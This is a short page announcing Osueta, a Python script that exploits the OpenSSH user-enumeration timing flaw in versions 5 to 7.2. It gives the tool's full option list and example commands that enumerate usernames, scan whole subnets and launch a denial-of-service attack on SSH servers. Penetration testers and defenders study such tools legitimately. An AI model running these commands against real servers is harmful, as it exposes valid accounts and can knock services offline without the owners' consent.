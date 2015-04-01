Osueta - Tool For Exploiting the OpenSSH User Enumeration Timing Attack
Osueta is a simple Python2 script that allows you to exploit the OpenSSH User Enumeration Timing Attack, present in OpenSSH version 5 to 7.2. The script has the ability to make variations of the username employed in the bruteforce attack, and the possibility to establish a DOS condition in the OpenSSH server.
Usage:
usage: osueta.py [-h] [-H HOST] [-k HFILE] [-f FQDN] [-p PORT] [-L UFILE] [-U USER] [-d DELAY] [-v VARI] [-o OUTP] [-l LENGTH] [-c VERS] [--dos DOS] [-t THREADS] OpenSSH User Enumeration Time-Based Attack Python script optional arguments: -h, --help show this help message and exit -H HOST Host Ip or CIDR netblock. -k HFILE Host list in a file. -f FQDN FQDN to attack. -p PORT Host port. -L UFILE Username list file. -U USER Only use a single username. -d DELAY Time delay fixed in seconds. If not, delay time is calculated. -v VARI Make variations of the username (default yes). -o OUTP Output file with positive results. -l LENGTH Length of the password in characters (x1000) (default 40). -c VERS Check or not the OpenSSH version (default yes). --dos DOS Try to make a DOS attack (default no). -t THREADS Threads for the DOS attack (default 5).
Examples:
- A single user enumeration attempt with username variations:
./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes
- A single user enumeration attempt with no user variations a dos attack:
./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes
- Scanning a C class network with only one user:
./osueta -H 192.168.1.0/24 -p 22 -U root -v no
- Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters:
./osueta -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50
